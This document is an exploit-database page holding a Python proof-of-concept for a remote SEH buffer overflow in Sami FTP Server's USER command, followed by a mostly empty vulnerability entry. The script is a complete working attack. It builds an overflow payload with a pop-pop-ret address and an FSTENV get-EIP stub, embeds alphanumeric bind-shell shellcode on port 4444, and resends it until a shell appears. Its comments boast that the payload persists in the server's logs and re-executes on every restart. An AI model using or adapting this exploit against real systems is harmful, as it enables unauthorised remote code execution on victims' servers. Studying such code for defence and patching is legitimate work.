# Tested on: Win7 64bit and Win10 64 bit
 
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time... 
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
 
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write the IP to attack
# * Connect to the same IP on port 4444
#
# BONUS
# =====
# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
# start and so, it will crash and run our shellcode everytime it starts.
 
# Why?
# ====
# The graphical interface tries to show the user name which produces an overflow overwriting SEH
 
# Exploit code
# ============
 
import socket
import struct
 
def doHavoc(ipaddr):
    # Bad chars: 00 0d 0a ff
    alignment = "\x90"*3
     
    jmpfront = "345A7504".decode('hex')
    #CPU Disasm
    #Hex dump          Command 
    #  34 5A           XOR AL,5A
    #  75 04           JNE SHORT +04
     
    # pop pop ret in tmp01.dll
    popret = 0x10022ADE
     
    # fstenv trick to get eip: phrack number 62
    # and store it into EAX for the metasploit shell (BufferRegister)
    getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
    #CPU Disasm
    #Hex dump          Command
    #  D9EE            FLDZ
    #  D934E4          FSTENV SS:[ESP]
    #  8B44E4 0C       MOV EAX,DWORD PTR SS:[ESP+0C]
    #  04 0B           ADD AL,0B
 
    # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
    shellcode = (
        getEIPinEAX +
        "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
        "e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
        "xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
        "VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
        "yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
        "8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
        "op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
        "qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
        "Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
        "GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
        "sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
        "ioJuAA"
    )
     
    # Final payload, SEH overwrite occurs at 600 bytes
    payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
    try:
        s = socket.create_connection((ipaddr, 21))
        s.send("USER "+ payload +"\r\n" )
        print s.recv(4096)
         
        s.send("PASS "+ payload +"\r\n" )
        print s.recv(4096)
        print s.recv(4096)
    except Exception as e:
        print str(e)
        exit("[+] Couldn't connect")
             
if __name__ == "__main__":
    ipaddr = raw_input("[+] IP: ")
    doHavoc(ipaddr)
    while raw_input("[?] Got shell?(y/n) ").lower() == "n":
        doHavoc(ipaddr)
    print "[+] Enjoy..."

    

- Vulnerability information

22734
Sami FTP Server USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-01-24 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
